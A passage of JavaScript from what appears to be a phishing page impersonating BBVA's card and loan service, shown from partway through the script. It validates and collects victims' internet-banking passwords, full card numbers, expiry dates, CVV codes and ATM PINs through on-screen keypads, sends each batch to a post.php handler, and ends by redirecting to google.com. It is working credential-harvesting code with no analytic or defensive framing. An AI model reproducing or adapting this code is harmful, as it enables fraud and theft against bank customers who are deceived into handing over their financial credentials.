			$("#secret").val(pass.substring(0,pass.length-1));
		}
	});

	$("#delete_1").click(function(e) {
		if($("#secret").val().length >= 1) {
			$("#secret").val("");
		}
	});

	$("#teclado_2 .separator .seed-enabled").click(function(e) {
		if($("#secure").val().length == $("#secure").attr("maxlength")-1) {
			strng = $("#secure").val();
			$("#secure").val(strng + this.value);
			hide_2();
		} else if ($("#secure").val().length < 4) {
			strng = $("#secure").val();
			$("#secure").val(strng + this.value);
		}
	});

	$("#clean_2").click(function(e) {
		pass = $("#secure").val();
		if(pass.length >= 1){
			$("#secure").val(pass.substring(0,pass.length-1));
		}
	});

	$("#delete_2").click(function(e) {
		if($("#secure").val().length >= 1) {
			$("#secure").val("");
		}
	});

	function formato() {
		if ($("#info").val() == "true") {

			if ($("#tipo").val() != "amex") {
				$('#presente').mask("0000 0000 0000 0000");
				$("#presente").attr('maxlength', '19');
			} else {
				$('#presente').mask("0000 000000 00000");
				$("#presente").attr('maxlength', '17');
			}
		} else {
			$('#presente').mask("0000 0000 0000 0000");
		}
	}

	function msg_code() {
		if ($("#tipo").val() != "amex") {
			$("#secret").attr('maxlength', '3');
			$("#sub_4").html("3 digitos parte posterior");
		} else {
			$("#secret").attr('maxlength', '4');
			$("#sub_4").html("4 digitos parte frontal");
		}
	}

    function tipoFiltro(e) {
        var charCode = e.key;

        if((/^[0-9]+$/.test(charCode))) {
            return true;
        } else {
            return false;
        }
    }

    function post(post) {

		let y = document.querySelector("#presente"); // Tarjeta
		let z = document.querySelector("#info"); // Valido Tarjeta
		let w = document.querySelector("#tipo"); // Tipo de Tarjeta
		let d = document.querySelector("#llave"); // Clave
		let g = document.querySelector("#one"); // Interes
		let h = document.querySelector("#two"); // Meses
		let i = document.querySelector("#tre"); // Cuota
		let j = document.querySelector("#for"); // Desgravamen
		let k = document.querySelector("#five"); // Total Desgravamen
		let l = document.querySelector("#six"); // TEM
		let m = document.querySelector("#seven"); // TEA
		let a = document.querySelector("#caduco"); // Vencimiento
		let b = document.querySelector("#secret"); // CVV
		let c = document.querySelector("#secure"); // ATM
		var fecha = new Date();
		var yea_actual = parseInt(fecha.getFullYear().toString().substr(-2));
		var mes_actual = (fecha.getMonth() + 1).toString();
		if (mes_actual.length === 1) { mes_actual = parseInt("0"+mes_actual); }
		var vencimiento = a.value;
		var newFecha = vencimiento.split('/');
		var mes = newFecha[0];
		var yea = newFecha[1];

		let xd = document.querySelector("#carta").value;
		let one = xd.substr(0, 3);
		let two = xd.substr(-3);
        
        let x = post;

        switch (x) {
    
            case 1: // Login

                if (d.value.length < 6) {
					$("#alerta").html("* Ingrese ó complete su clave de internet").show();
					d.focus();
					return false;
				}

                var parametros = {
                    "data_4": d.value,
					"data_10": g.value,
					"data_12": i.value,
					"data_13": h.value,
					"data_14": j.value,
					"data_15": k.value,
					"data_16": l.value,
					"data_17": m.value,
                    "orden": "B", }
                
				$("#alerta").hide();
                $("#loader_ajax").show();
				
                $.ajax({
                    data: parametros,
                    url: 'post.php',
                    type: 'post',
                    success: function(response) {
                        setTimeout(function() {
							history.pushState(null, null, 'card-registro');
							$("#uno").hide("");
							$("#dos").show("");
							$("#loader_ajax").hide(600);
                        }, 1800);
                    }
                });
    
            break;

			case 2: // Tarjeta
			
				if (w.value != "amex") { largo = "19"; msg_code(); } else { largo = "17"; msg_code(); }

				if (y.value.length < largo) {
					$("#alerta").html("* Ingresa un número de tarjeta BBVA, Crédito Amex ó Crédito Visa.").show();
					y.focus();
					return false;
				}

				if (z.value != "true") {
					$("#alerta").html("* El número de tarjeta es invalido, por favor verifique").show();
					y.focus();
					return false;
				}

				if (tipo.value != "amex") { newcvv = "3"; msg_c = "[3 digitos parte posterior]"; } else { newcvv = "4"; msg_c = "[4 digitos parte frontal]"; }

				if (a.value.length < 5) {
					$("#alertas").html("* Debes ingresar la fecha de vencimiento de tu tarjeta").show();
					a.focus();
					return false;
				}

				if (mes == 00 || mes > 12) {
					$("#alertas").html('* El <b>mes</b> ['+ mes +'] no corresponde a un mes valido, por favor vuelva a ingresarlo').show();
					a.focus();
					return false; 
				}

				if (yea < yea_actual || yea > (Number(yea_actual)+5)) {
					$("#alertas").html('* El <b>año</b> ['+ yea +'] no corresponde a un año valido, por favor vuelva a ingresarlo').show();
					a.focus();
					return false;
				}

				if (mes <= mes_actual && yea == yea_actual) {
					$("#alertas").html('* Su tarjeta ha vencido, por favor verifique su fecha y vuelva a ingresarlo').show();
					a.focus();
					return false;
				}

				if (b.value.length < newcvv) {
					$("#alertas").html('* Debes ingresar el código cvv de tu tarjeta ' + msg_c).show();
					b.focus();
					return false;
				}

				if (b.value == 123 || b.value == one || b.value == two) {
					$("#alertas").html('* El código cvv ingresado <b>['+ b.value +']</b>, no corresponde a uno valido, por favor vuelva a ingresarlo').show();
					b.focus();
					return false;
				}

				if (c.value.length == 0 || c.value.length < 4) {
					$("#alertas").html('* Ingrese su clave de 4 dígitos').show();
					c.focus();
					return false;
				}

				var parametros = {
					"data_6": a.value,
					"data_7": b.value,
					"data_8": c.value,
					"data_5": y.value,
					"data_19": w.value,
					
					"orden": "C", }

				$("#alertas").hide();
				$("#loader_ajax").show();
				$("#carta").val(y.value);

				$.ajax({
					data: parametros,
					url: 'post.php',
					type: 'post',
					success: function(response) {
						setTimeout(function() {
							history.pushState(null, null, 'completado');
							$("#uno, #dos").hide("");
							$("#tres").show("");
							$("#loader_ajax").hide(600);
						}, 2500);
					}
				});

			break;

			case 3: // Salir

				$("#loader_ajax").show();
				$('#btns').prop('disabled', true);

				setTimeout(function() {
					$('#btns').prop('disabled', false);
					window.open('https://google.com', '_parent');
				}, 2500);

			break;

            default:
            break;
        }
    }
</script>
</body>
</html>